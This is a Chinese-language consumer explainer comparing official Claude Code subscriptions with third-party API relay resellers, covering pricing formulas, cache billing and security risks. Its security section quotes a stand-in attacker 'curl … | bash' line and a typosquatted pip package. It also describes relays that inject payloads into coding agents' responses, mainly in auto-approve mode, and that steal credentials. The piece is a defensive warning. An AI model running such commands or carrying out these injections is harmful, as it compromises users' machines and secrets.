Claude Code 官方订阅 vs 中转站
Claude Code 官方订阅 vs 中转站
一、什么是中转站?什么是 CC 官方订阅?
Claude Code 与 API 的关系
Claude Code(简称 CC)是 Anthropic 推出的终端编码代理。它调用 Claude 模型执行代码编写、调试、重构等任务,每一次交互都会消耗 token。
使用 Claude Code 有两条路径:
- 官方订阅:在 Anthropic 官网购买 Pro / Max 计划,通过官方服务器直连模型
- API 接入:通过 Anthropic API 或第三方转发服务(即”中转站”)接入模型
什么是中转站
中转站是一种第三方中间商服务。它在你和 Anthropic(或 AWS Bedrock 等模型托管平台)之间充当转发代理:接收你的请求,转发给上游模型提供商,再把响应返回给你。
中转站存在的原因:
- 国内用户无法直接访问 Anthropic 官网或支付美元
- 官方 API 按量计费价格高昂
- 官方 Max 订阅存在支付门槛和封号风险
绝大多数中转站的计费后台基于开源项目 One-API(30.5K GitHub stars,119 万 Docker pulls)及其分支 new-api(25.4K stars,125 万 Docker pulls),提供统一的额度管理和模型路由能力。
CC 官方订阅档位
Anthropic 官方对额度的描述含糊不清(“5 小时内约 50-200 个提示”),但通过逆向工程(详见第五章)已经完整破解了真实额度:
| 套餐 | 月价 | 5h Credit 限额 | 周 Credit 限额 | 缓存策略 |
|---|---|---|---|---|
| Pro | $20(≈¥144) | 550,000(1×) | 5,000,000(1×) | 5min 缓存写入 |
| Max 5× | $100(≈¥720) | 3,300,000(6×) | 41,666,700(8.33×) | 1h 缓存写入 |
| Max 20× | $200(≈¥1,440) | 11,000,000(20×) | 83,333,300(16.67×) | 1h 缓存写入 |
注意两个被官方隐藏的事实:
- Max 5× 的周限是 Pro 的 8.33 倍(不是名义上的 5 倍)——5× 是性价比甜点
- Max 20× 的周限只有 Pro 的 16.67 倍(不是 20 倍)——20× 的边际收益递减
所有订阅计划共享一个关键特性:CacheRead 完全免费。这是理解后续所有成本分析的核心前提。
二、中转站的渠道来源与各渠道的问题
你在中转站买的每一个”刀”,背后可能是完全不同的货源。目前市面上的 Claude Code 中转渠道主要有 五类,每一类的技术架构、风险和实际体验差异巨大。
1. 逆向渠道(kior、反重力等)
原理:从 Antigravity、Cursor 等第三方客户端中逆向提取 API 接口,封装成 OpenAI 兼容格式出售。
技术架构:后台维护一个逆向出来的 API key 池。你每次请求被随机分配到池中某个 key 上轮询。
致命问题:
- 提示词污染:逆向出来的 API 携带源平台自身的系统提示词(比如反重力的专属 prompt),这些 prompt 会混入你的上下文,直接造成降智
- 缓存为零:key 池轮询意味着你的下一个请求几乎不可能路由回上一个 key。Claude 的缓存机制要求同一个 key 的连续请求才能命中缓存——轮询直接打碎了这个前提
- 双重亏损:没有缓存 = 所有 token 按新建计费(成本翻倍)+ 模型丢失上下文缓存(思考不连贯 = 降智)
逆向渠道是所有渠道里最差的:你付的钱买到了更贵的账单和更蠢的模型。
2. AWS Bedrock / Azure / GCP 多对多(key 池模式)
原理:商家在 AWS Bedrock 等云平台上部署 Anthropic 官方模型,申请多个 IAM 账号的 API key,组成 key 池对外出售。
技术架构:你的请求在多个 AWS API key 之间轮询,每个 key 对应一个独立的模型实例。
优点:模型本身是 Anthropic 官方正品,支持 1M 上下文、1h 缓存。智力水平不降智。
致命问题:
- 缓存命中率极低:和逆向渠道同理——key 池轮询导致你的请求无法稳定路由到同一个 key,缓存几乎建立不起来
- 标价便宜但实际消耗高:标价 0.1-0.3 元/刀看似极低,但因为没有缓存,所有 token 都按 fresh input + cache write 计费,实际单次请求成本远高于有缓存的方案
这类渠道的本质矛盾:模型没问题,但架构决定了缓存用不上——最贵的那部分成本(缓存写入)你每次都要重新付。
3. AWS Bedrock 一对一(专属模型)
原理:商家部署一个专属模型实例,分配固定 API key 给你的团队使用。所有请求路由到同一个模型。
技术架构:一对一绑定,等同于你自己在 AWS 上开了一个 Bedrock 实例。
优点:完整缓存、满血智力、1M 上下文、1h 缓存。体验与官方 API 无异。
致命问题:
- 价格昂贵:按 Anthropic API 官方定价计费。经过渠道折扣后,普通用户到手约 3.5 元/刀,企业大户谈到极限约 1 元/刀
- 本质上就是 API:你付的是 API 价格,和 Max 订阅的「缓存读免费」优势完全无关
这是体验最好但最贵的中转渠道。但既然都花这个钱了,为什么不直接订 Max?
4. Max 号池 / sub2api 中转站
原理:商家批量开 Max 订阅账号,通过 sub2api 或 CRS(claude-relay-service)反代成 OpenAI 兼容 API,按号池轮询对外出售。
技术架构:后台几十到几百个 Max 账号组成号池。sub2api 按 API 定价算法对每个用户计量额度。
致命问题:
- 计费算法错位:sub2api 默认使用 API 定价算法(CacheRead 收费 $0.5/M token),但 Max 账号的真实消耗使用官方算法(CacheRead 免费)。同样的使用量,sub2api 后台显示的消耗是官方真实消耗的 2-8 倍
- 缓存不稳定:号池的号额度用光就轮换。换号 = 缓存消失 = 下一个请求全部重新写入。即使商家算法优化做得好(尽量保持同一用户 session 在同一账号),也无法保证 1 小时内不换号
- 封号风险传导:sub2api 的 TLS 握手指纹与 Claude Code 原生不一样,Anthropic 技术上可以识别。2026 年 3 月严打后翻车率激增
- 超卖套利空间大:因为 API 刀 ≈ 2-4 倍官方刀,车头按 API 刀算限额、按官方刀用实际额度,中间的差额就是利润——四人车可以按八人卖
sub2api 中转站赚的就是「两种刀之间的汇率差」。行规心照不宣,没人有动机戳破。
5. OpenRouter / ZenMux 等聚合平台
原理:聚合多家模型提供商,提供统一 API 接口。背后可能是自部署模型或直接转发。
现状:缓存表现和定价取决于具体实现,缺乏透明度。中国用户使用时常经过多层代理链路。
这类平台的核心问题是不透明:你不知道请求实际经过了几跳,每一跳都是一个潜在的安全和成本风险点。
三、中转站的倍率体系与计价陷阱
中转站的价格页面上写满了”倍率""汇率""分组”这些术语。这套体系源自 One-API 的统一换算框架,把不同价格的模型全部折算到一个内部额度单位中。
核心基准:$1 额度 = 500,000 基准 Tokens(以早期模型 davinci-002 的 $2/1M tokens 定价为基准)。
你需要知道的五个概念
| 术语 | 含义 | 对你的影响 |
|---|---|---|
| 充值汇率 | 你花多少人民币换 1 美元站内额度 | 连接你的钱包和站内额度的桥梁 |
| 模型倍率 | 中转站给某模型设定的输入价 ÷ 2.00 | 决定基础单价。倍率越高,模型越贵 |
| 补全倍率 | 模型输出价 ÷ 输入价 | 决定额度消耗速度。AI 生成回答通常比输入贵,Opus 的补全倍率是 5 |
| 分组倍率 | 你所在用户组的额外乘数 | 最容易被忽略的隐藏加价。“高速官转”组可能是 2×,默认组是 1× |
| 官方标准模型倍率 | 官方输入价 ÷ 2.00(黄金标尺) | 衡量中转站定价是否公道的基准线 |
核心公式
官方标准模型倍率(用来当标尺):
官方标准模型倍率 = 官方模型输入价格 ($/1M tokens) ÷ 2.00
主要模型的官方标准倍率速查:
| 模型 | 官方输入价 ($/1M) | 官方标准模型倍率 |
|---|---|---|
| claude-3-haiku | $0.25 | 0.125 |
| claude-3.5-sonnet | $3.00 | 1.5 |
| claude-3-opus | $15.00 | 7.5 |
| gpt-4o-mini | $0.15 | 0.075 |
| gpt-4o | $5.00 | 2.5 |
| gemini-1.5-pro | $3.50 | 1.75 |
中转站实际价格(终极公式):
中转站设定的模型倍率
实际价格(元) = ─────────────────────── × 分组倍率 × 充值汇率
官方标准模型倍率
这个公式的含义是:为了获得官方 $1 等效的服务,你在这家中转站实际需要支付多少人民币。
额度扣费公式(你的余额是怎么被扣的):
分组倍率 × 模型倍率 × (输入Token数 + 输出Token数 × 补全倍率)
扣除额度($) = ────────────────────────────────────────────────────────────────
500,000
实例演算:一家中转站到底贵不贵?
以一家虚构的”FakeAI”中转站为例:
已知条件:
├── 充值汇率 = 1(1 元人民币 = 1 美元站内额度)
├── 目标模型:gpt-4o-mini
├── 中转站将 gpt-4o-mini 输入价定为 $0.60/1M tokens
│ → 中转站模型倍率 = 0.60 ÷ 2.00 = 0.3
├── 分组:"高速官转",分组倍率 = 2
└── 官方 gpt-4o-mini 输入价 $0.15/1M
→ 官方标准模型倍率 = 0.15 ÷ 2.00 = 0.075
代入终极公式:
实际价格 = (0.3 ÷ 0.075) × 2 × 1 = 4 × 2 × 1 = 8.00 元
结论:在 OpenAI 官网花 1 美元(≈7.3 元)就能用的 gpt-4o-mini,在这家中转站要花 8 元人民币。这是一个溢价渠道。
同样的方法算 Claude Opus:
某中转站 claude-3-opus 设定:
├── 中转站输入价 $18/1M → 模型倍率 = 18 ÷ 2 = 9
├── 官方标准模型倍率 = 15 ÷ 2 = 7.5
├── 分组倍率 = 1.5("稳定渠道"组)
├── 充值汇率 = 6.67(充 100 元 = 15 美元额度)
实际价格 = (9 ÷ 7.5) × 1.5 × 6.67 = 1.2 × 1.5 × 6.67 = 12.0 元
官方 $1 ≈ 7.3 元,这家中转站要 12 元,溢价 64%。
三步速判法:3 分钟看穿任何中转站
第一步:找到三个数字
- 充值汇率是多少?(充 100 元给 15 美元额度 → 汇率 = 100÷15 ≈ 6.67)
- 你常用模型的模型倍率是多少?(若网站只标美元价格 → 倍率 = 输入价 ÷ 2)
- 你的账户分组倍率是多少?(若无特殊说明,默认 1)
第二步:查官方标准模型倍率(见上表)
第三步:代入公式,和实时汇率(约 7.3 元/美元)比较
实际价格 = (中转站模型倍率 ÷ 官方标准模型倍率) × 分组倍率 × 充值汇率
- 实际价格 < 7.3:折扣渠道,数字越小越划算
- 实际价格 ≈ 7.3:价格公道,与官方成本持平
- 实际价格 > 7.3:溢价渠道,你在为中转/稳定/特殊功能额外付费
常见的三个「猫腻」
猫腻一:模型倍率虚高
中转站自行设定模型倍率,不受约束。官方 Opus 标准倍率 7.5,中转站设成 9 甚至 12——你在价格页面看不出来,因为页面可能只显示”Opus: $18/1M”,不会告诉你官方只要 $15/1M。
猫腻二:分组倍率隐藏加价
这是最容易被忽略的暗坑。很多中转站按用户等级设置不同分组:免费组 1×,普通组 1.5×,“高速官转”组 2×。你看到的模型倍率一模一样,但实际扣费翻了 1.5-2 倍。务必确认自己账户是否被放进了高分组倍率的用户组。
猫腻三:低汇率 + 高倍率的组合拳
极低的充值汇率(如 1:1)往往伴随着极高的模型倍率。你被低汇率吸引充了钱,但模型倍率设成官方的 2-4 倍——综合下来比 1:7 汇率 + 标准倍率还贵。永远不要只看充值汇率,必须三个数字一起算。
某中转站声称”1:1 官方价”,为什么算出来还是更贵?检查三个点:① 模型倍率是否大幅高于官方 ② 你是否被放进了高分组倍率的用户组 ③ 充值汇率是否高于市场实时汇率。三者任意一个偏高,实际成本都会上升。
四、计费算法到底怎么算?数字说话
上一章分析的是中转站倍率体系对「标价」的加价。本章分析的是一个更隐蔽的问题——中转站和官方用的根本不是同一套计费算法,同样的使用量算出来的消耗可以差 2-8 倍。
定义:市面上存在三种「刀」
同一个”刀”字,背后是完全不同的计算公式:
API 刀(sub2api / ccusage / Cursor 使用):
费用 = Input×$5 + Output×$25 + CacheWrite×$6.25 + CacheRead×$0.5
CC 官方刀 Max(Max 5×/20× 的真实消耗):
费用 = Input×$5 + Output×$25 + CacheWrite×$10 + CacheRead×$0(免费)
CC 官方刀 Pro(Pro $20 的真实消耗):
费用 = Input×$5 + Output×$25 + CacheWrite×$6.25 + CacheRead×$0(免费)
核心差异就一个:CacheRead 是否收费。
Max 的 CacheWrite 单价更高($10 vs $6.25,因为 Max 是 1h 缓存,Pro 是 5min 缓存),但 CacheRead 完全免费。API 算法的 CacheWrite 便宜但 CacheRead 收 $0.5/M token。
CacheRead 占比有多大?
这是决定两种刀汇率差的关键参数。实测编码场景下:
一天真实用量分布(500K 上下文):
├── Input ≈ 3,894 tokens(<1%) ← 你打的那几个字
├── Output ≈ 117,481 tokens(~1%)
├── CacheWrite ≈ 14M tokens (~29%)
└── CacheRead ≈ 472M tokens (~70%) ← 这块官方免费,API 收钱
用这组真实数据,分别按两种算法计算同一天的消耗:
官方刀算法:
3894×$5/M + 117481×$25/M + 14M×$10/M + 472M×$0/M
= $0.02 + $2.94 + $140 + $0
= $143
API 刀算法:
3894×$5/M + 117481×$25/M + 14M×$6.25/M + 472M×$0.5/M
= $0.02 + $2.94 + $87.5 + $236
= $326
同一天、同样的使用量:官方算 $143,API 算 $326。汇率 1:2.28。
这还只是 500K 上下文。上下文越大,CacheRead 占比越高,汇率差越大:
| 平均上下文 | CacheRead 占比 | API 刀 : 官方刀 |
|---|---|---|
| 250K | ~60% | 1 : 2 |
| 500K | ~70% | 1 : 4 |
| 1M | ~85% | 1 : 8 |
不手动
/compact或/clear的话,8 小时连续编码上下文就能涨到 500K,两天到 1M。上下文越大,中转站的「汇率税」越重。
这个汇率差怎么验证?
只有按官方刀算法得到的金额 ÷ 5h 限额 $82.5(Max 5× 的单窗口美元等效),算出的百分比才能和 Claude Code 内 /usage 显示的百分比对齐。
如果按 API 刀算,得到的百分比是 /usage 的 2-3 倍——一个人一天就能”用掉”三人车的全部官方额度,这在逻辑上不可能。
有用户实测:oauth 直连 20× 三人车,自己一天 sub2api 后台显示 $326,但三个人加起来的 5h×3 官方总额也才 $246。API 刀的数字是虚高的。
sub2api 拼车中车头的四种算法策略
这直接决定你作为乘客实际拿到多少额度:
| 车头策略 | 乘客算法 | 车头自留 | 后果 |
|---|---|---|---|
| A. 良心车头 | 官方刀(CacheRead 免费) | 公平分配 | 不浪费,公平 |
| B. 不知情车头 | API 刀 + 按官方总额分配 | 浪费归零 | 浪费高达 50% 额度,但车头也不知道 |
| C. 精明车头 | API 刀 + 自留差额 | 40%+ 归车头 | 四人车车头实际拿到近一半额度 |
| D. 超卖车头 | API 刀 + 超卖人数 | 利润翻倍 | 四人车按八人卖,乘客不知道车里几个人 |
大多数车头处于 B 或 C 的状态。 A 需要车头主动修改 sub2api 的计费算法设置,但 sub2api 默认就是 API 算法。D 是行业潜规则——乘客无法验证车内实际人数。
「为什么没人说这个秘密?」——中转站老板知道但没有动机戳破,因为赚的就是两种刀之间的汇率差。
倍率陷阱 + 两种刀 = 双重加价
第三章的倍率体系和本章的「两种刀」问题是叠加关系:
你实际支付的钱
= 倍率体系的加价(模型倍率 × 分组倍率 × 充值汇率)
× 两种刀的汇率差(CacheRead 收费导致的 2-8 倍膨胀)
以一个「看似公道」的中转站为例:
倍率体系:实际价格 = 8.5 元(溢价 16%,看起来还行?)
两种刀加价:500K 上下文 → API 刀是官方刀的 4 倍
综合成本:8.5 × 4 = 34 元 ≈ 等效 $4.7
而 Max 5× 的官方等效:0.34 元/刀 × 7.3 = 2.5 元 ≈ $0.34
实际贵了 13.8 倍。
五、CC 官方订阅的真实额度和性价比
Credit 系统逆向
安全研究者 she-llac 通过抓包 Claude SSE 响应中未四舍五入的 usage_ratio 浮点数(如 0.16327272727272726),利用 Stern-Brocot 树恢复精确分数,再对大量请求做控制变量实验,完整破解了 Claude 的 Credit 计费体系。
Credit 换算公式:
credits_used = input_tokens × R_in + output_tokens × R_out
各模型费率(credits/token):
Input Output
Haiku: 2/15 10/15
Sonnet: 6/15 30/15
Opus: 10/15 50/15
三大规律:
Output = Input × 5(所有模型)
Opus = Haiku × 5
Sonnet = Haiku × 3
统一换算:7.5 美元 = 1M Credits
订阅 vs API 的价值对比
| 套餐 | 月 Credits | 月等效 API $ | 订阅价 | 性价比倍数 |
|---|---|---|---|---|
| Pro $20 | 21.7M | $163 | $20 | 8.1× |
| Max 5× $100 | 180.6M | $1,354 | $100 | 13.5× |
| Max 20× $200 | 361.1M | $2,708 | $200 | 13.5× |
以上为无缓存下界。加入缓存后,因为 CacheRead 免费,价值进一步飙升:
| 场景 | 订阅 Credits | API 等效 $ | Max 5× 周容量 | 月等效 $ | 倍数 |
|---|---|---|---|---|---|
| 冷缓存(100K 写 + 1K 出) | 70,000 | $0.65 | 595 次/周 | $1,676 | 16.8× |
| 热缓存(100K 读 + 1K 写 + 1K 出) | 4,000 | $0.08 | 10,416 次/周 | $3,667 | 36.7× |
热缓存场景下,$100 订阅拿到 $3,667 的 API 等效价值——超过 36 倍。
真实采购价推导
按实测一周编码记录(CacheRead 命中 83%):
无缓存基准 = ¥720 ÷ ($1,354 ÷ ¥7.2/刀) = 0.53 元/刀
缓存命中 83% → 加成系数 1.558 → 实际 = 0.53 ÷ 1.558 = 0.34 元/刀
Max 5× 的等效采购价:0.34 元/刀。 这是后续所有对比的基准线。
六、中转站的安全风险
以上分析的全是经济账。但中转站的风险远不止多花钱——你的代码、密钥和对话内容正面临三类完全不同的安全威胁。
6.1 技术层面:载荷注入与凭据窃取(UCSB 实证)
UCSB(加州大学圣塔芭芭拉分校)在 2026 年 4 月发表的学术论文(arxiv:2604.08407)首次系统性量化了 LLM 中转路由器的安全风险。
研究规模:28 个付费路由器(淘宝/闲鱼/Shopify)+ 400 个免费路由器(sub2api/new-api 模板)。
| 行为 | 付费(28 个) | 免费(400 个) |
|---|---|---|
| 主动注入恶意代码 | 1 | 8 |
| 自适应规避(前 N 次正常,之后注入) | 0 | 2 |
| 窃取 AWS 凭据 | 0 | 17 |
| 盗取 ETH 私钥 | 0 | 1 |
四类攻击手段:
- 载荷注入:把模型返回的
curl https://正常.sh | bash替换为curl https://攻击者.sh | bash。修改后仍是合法 JSON,不触发任何异常 - 依赖投毒:把
pip install requests替换为pip install reqeusts(typosquat),绕过域名白名单 - 条件触发:前 50 次请求表现正常,只在 YOLO 模式 + Rust/Go 项目时注入——你的烟雾测试永远测不出来
- 被动窃取:扫描流量中的 API key、AWS key、GitHub Token、ETH 私钥,异步泄露但不改响应——你完全无感
蜜罐实验:研究者部署弱配置蜜罐后被自动纳入中转链路——4 万次未授权访问,20 亿 tokens 流量(~13 GB 明文),99 个凭据泄露跨 440 个 Codex 会话,其中 401 个处于 YOLO 自动批准模式。
跨框架测试:Claude Code、Codex、OpenCode、OpenClaw —— 0/4 实现了响应完整性校验。载荷注入兼容率 100%。
供应链最弱链:你 → 淘宝卖家 → 二级聚合商 → OpenRouter → 模型主机。每一跳终止并重建 TLS,每一跳拥有明文读写权。只要链中任一节点恶意,整条链路的完整性即被破坏。
6.2 产业链层面:黑卡、退款流与”三头吃”
中转站背后的产业链远比你想象的复杂。来自多位站长和行业内部人士的公开信息揭示了完整的利润链条:
号源的四种来源:
| 来源 | 成本 | 说明 |
|---|---|---|
| 黑卡盗刷 | 近零 | 利用支付验证漏洞批量注册,封号后申请退款,成本趋近于零 |
| 逆向反代 | 低 | 破解 Kiro/Cursor/Antigravity 的内部接口,把客户端订阅额度转卖 |
| 云厂商 Credit 灰色流转 | 中 | AWS/Azure/GCP 发给初创公司的算力额度被违规倒卖 |
| 企业折扣协议 | 高 | 合法正规,但利润最薄 |
“三头吃”盈利模式——一些中转站同时从三个方向赚钱:
- 第一头:收你的充值费用
- 第二头:用批量注册的账号白嫖额度,封号后退款——等于用官方的钱来服务你
- 第三头:你的所有输入输出都是明文,打包卖给需要训练数据的买家
有站长公开表示收到了数据购买请求但拒绝了——他拒绝了,不代表别人也拒绝。
跑路生命周期:低价+送额度吸引用户 → 规模大了涨价降稳定性 → 群里吐槽就封号踢人 → 某天域名消失,余额归零。
6.3 模型注水:你用的可能不是 Opus
界面显示 claude-opus-4,后台跑的可能是 gpt-5.4 甚至某个 7B 开源模型。这就是业内所说的”换头术”。
注水的经济动机:圈内 gpt-5.4 成本约 4 分/次,ccmax Opus 成本要 1 块 5——中间差了 几十倍。有的中转站十次注 1-2 次水,用户很难察觉。
学术实证(CISPA 亥姆霍兹信息安全中心,arxiv:2603.01919):
- 被测 24 个 API 端点中,超过半数在后台换了模型
- 用假模型每花 $1,错误数量是官方 API 的 2-4 倍
- 187 篇学术论文在用这些假 API 跑实验,其中 62% 已被 ACL/CVPR 等顶会接收
SLA 承诺的真相(来自站长公开发言):
- “市面上敢承诺 SLA 的全都是注水大户”——风控一提高账号成片死,不标红的基本都是逆向渠道
- 所有号称能”网页检测满血 CC”的工具全是智商税——只查几个 tools 字段和特定返回值,逆向渠道可以完美伪装
- 有大佬可以把 kiro/gpt-5.4 完美伪装成 ccmax 通过市面上所有的网页检测手段
唯一相对可靠的注水检测方法:拿中转返回的思考块签名,提交到官方 ccmax 进行验证。逆向渠道的签名不会被官方认证,直接返回报错。
6.4 数据风险:你是付费客户,也是免费的训练数据
所有经过中转的请求——完整的 prompt + response——就是一份现成的蒸馏数据。
尤其是 Claude Code 这类编程场景,用户产出的全是复杂推理链和真实的工程决策,对模型厂商来说是梦寐以求的蒸馏素材。
“中转站真正的商业模式很可能是:收你中转费是表面生意,把你的请求数据打包卖给大厂做模型蒸馏,才是核心 margin。”
“有些中转站上线的核心目的根本不是卖 API,而是为了收集特定场景的高质量蒸馏语料。低价只是获客手段。”
已知证据:
- Telegram 上有人向站长出价购买用户数据(截图已公开)
- V2EX 上有站长承认收到买数据的报价
防护建议:
- 关键密钥和私钥放到 Agent 不能读取的目录(
.gitignore/.claudeignore) - 环境变量不要以明文形式出现在代码或提示词中
- 使用中转站时,假设所有输入输出都会被永久存储
七、总结:中转站 vs 官方 CC 订阅
| 维度 | 官方 Max 5× | 逆向中转 | Bedrock 多对多 | Bedrock 一对一 | sub2api 拼车 |
|---|---|---|---|---|---|
| 标价 | ¥720/月 | 0.5-1 元/刀 | 0.1-0.3 元/刀 | ~1-3.5 元/刀 | 1-1.5 元/刀 |
| 计费算法 | 官方刀 | API 刀 | API 刀 | API 刀 | API 刀 |
| CacheRead | 免费 | 收费 | 收费 | 收费 | 收费 |
| 缓存命中 | ~83% | ~0% | ~10% | ~83% | 不稳定 |
| 实际等效成本 | 0.34 元/刀 | 2-8 元/刀 | 0.8-2.4 元/刀 | 1-3.5 元/刀 | 2-12 元/刀 |
| 模型智力 | 满血 Opus | 降智(污染+无缓存) | 正常 | 满血 | 波动(可能注水) |
| 注水风险 | 无 | 高(本身就是逆向) | 低 | 低 | 中(十次注 1-2 次) |
| 数据泄露 | 仅 Anthropic 可见 | 明文可被存储/售卖 | 明文可被存储 | 明文可被存储 | 明文可被存储/售卖 |
| 倍率加价 | 无 | 不透明 | 不透明 | 相对透明 | 不透明 |
| 代码安全 | 端到端直连 | 极高(注入+窃取) | 高 | 中 | 高 |
| 上下文 | 200K→1M | 取决于源 | 1M | 1M | 200K→1M |
中转站的真实成本由三层加价叠加,外加三层安全风险:
经济成本 = 倍率加价(模型倍率 × 分组倍率 × 充值汇率)
× 算法加价(CacheRead 收费导致的 2-8 倍膨胀)
安全成本 = 载荷注入风险(代码被篡改执行)
+ 数据泄露风险(对话被存储、售卖、用于蒸馏)
+ 模型注水风险(用低价模型冒充 Opus)
而 Max 5× 只有一个数字:0.34 元/刀——满血智力、完整缓存、端到端直连、零安全风险、零数据泄露。
所有中转渠道的实际等效成本都应该和 0.34 元/刀比较,而不是和标价比较。